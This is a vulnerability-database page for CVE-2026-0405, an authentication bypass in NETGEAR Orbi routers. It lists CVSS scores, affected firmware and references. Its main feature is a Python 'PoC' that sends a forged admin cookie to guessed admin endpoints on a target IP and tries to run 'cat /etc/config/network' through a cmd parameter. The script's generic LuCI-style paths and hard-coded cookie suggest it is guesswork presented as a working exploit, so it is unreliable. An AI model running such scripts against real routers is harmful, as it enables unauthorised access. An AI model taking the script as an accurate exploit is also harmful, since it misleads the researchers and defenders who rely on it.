CVE-2026-0405

Description

An authentication bypass vulnerability in NETGEAR Orbi devices allows users connected to the local network to access the router web interface as an admin.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:netgear:cbr750_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:netgear:cbr750:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:netgear:nbr750_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:netgear:nbr750:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:netgear:rbe370_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:netgear:rbe370:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:netgear:rbe371_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:netgear:rbe371:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:netgear:rbe372_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:netgear:rbe372:-:*:*:*:*:*:*:* - NOT VULNERABLE

NETGEAR CBR750 (所有固件版本)

NETGEAR NBR750 (所有固件版本)

NETGEAR RBE370 (所有固件版本)

NETGEAR RBE371 (所有固件版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-0405 PoC - NETGEAR Orbi Authentication Bypass
# This PoC demonstrates the authentication bypass vulnerability

import requests
import sys

def exploit_cve_2026_0405(target_ip):
    """
    Exploit for CVE-2026-0405: NETGEAR Orbi Authentication Bypass
    Target: NETGEAR Orbi devices (CBR750, NBR750, RBE370, RBE371)
    """
    target_url = f"http://{target_ip}/cgi-bin/"
    
    # Step 1: Bypass authentication by manipulating session cookies
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Cookie": "admin=1; session=admin_bypass"
    }
    
    # Step 2: Attempt to access admin panel without credentials
    # Try common admin endpoints with bypass techniques
    admin_endpoints = [
        "luci/admin/network",
        "cgi-bin/admin.cgi",
        "cgi-bin/luci/admin",
        "cgi-bin/root.cgi"
    ]
    
    for endpoint in admin_endpoints:
        try:
            response = requests.get(
                f"{target_url}{endpoint}",
                headers=headers,
                timeout=5
            )
            if response.status_code == 200 and "admin" in response.text.lower():
                print(f"[+] Authentication Bypass Successful!")
                print(f"[+] Admin Access: {target_url}{endpoint}")
                return True
        except requests.RequestException as e:
            continue
    
    # Step 3: Try to execute admin commands
    cmd_payload = {
        "cmd": "cat /etc/config/network",
        "username": "admin",
        "password": ""
    }
    
    try:
        cmd_response = requests.post(
            f"{target_url}admin.cgi",
            data=cmd_payload,
            headers=headers,
            timeout=5
        )
        if cmd_response.status_code == 200:
            print(f"[+] Command Execution Successful!")
            print(f"[+] Response: {cmd_response.text[:200]}")
    except requests.RequestException:
        pass
    
    return False

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python cve_2026_0405.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Targeting: {target}")
    print(f"[*] Exploiting CVE-2026-0405...")
    
    if exploit_cve_2026_0405(target):
        print("[+] Vulnerability Confirmed!")
    else:
        print("[-] Exploitation Failed or Target Not Vulnerable")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0405
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0405
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0405/
[4] VulDB https://vuldb.com/cve/CVE-2026-0405
[5] https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory
[6] https://www.netgear.com/support/product/cbr750
[7] https://www.netgear.com/support/product/nbr750
[8] https://www.netgear.com/support/product/rbe370
[9] https://www.netgear.com/support/product/rbe371
[10] https://www.netgear.com/support/product/rbe372
[11] https://www.netgear.com/support/product/rbe373
[12] https://www.netgear.com/support/product/rbe374
[13] https://www.netgear.com/support/product/rbe770
[14] https://www.netgear.com/support/product/rbe771

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0405", "sourceIdentifier": "a2826606-91e7-4eb6-899e-8484bd4575d5", "published": "2026-01-13T16:16:10.513", "lastModified": "2026-02-12T17:40:40.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability in NETGEAR Orbi devices allows \nusers connected to the local network to access the router web interface \nas an admin."}, {"lang": "es", "value": "Una vulnerabilidad de omisión de autenticación en dispositivos NETGEAR Orbi permite a los usuarios conectados a la red local acceder a la interfaz web del router como administrador."}], "metrics": {"cvssMetricV40": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NO", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "a2826606-91e7-4eb6-899e-8484bd4575d5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:cbr750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.14.8", "matchCriteriaId": "B0A2EEFF-5049-4FEA-BDE2-05F7EC1716CD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:cbr750:-:*:*:*:*:*:*:*", "matchCriteriaId": "CBD14EFC-C6EF-485B-A594-73B8525704A5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:nbr750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.15.14", "matchCriteriaId": "B72BE7F2-BA8C-49BF-AB3C-5E5EA7272524"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:nbr750:-:*:*:*:*:*:*:*", "matchCriteriaId": "5666EA3D-AF24-42A0-8EE9-4BB580A6957A"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbe370_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.3.11", "matchCriteriaId": "2A13940B-149A-4B1D-A55D-279D2D44A65E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbe370:-:*:*:*:*:*:*:*", "matchCriteriaId": "368F8D25-16A4-416B-82EC-7508218DD281"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbe371_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.3.11", "matchCriteriaId": "B4F7F974-8561-4B94-A2CE-8E2639FB2521"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:netgear:rbe371:-:*:*:*:*:*:*:*", "matchCriteriaId": "00BA4811-2DD1-4DA6-8ECF-CFFEFCB443F2"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:netgear:rbe372_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "12.1.3.11", "matchCriteriaId": "8F7B120D-3A47-42F5-9E88-F221CE92ACA2"}]}, {" ... (truncated)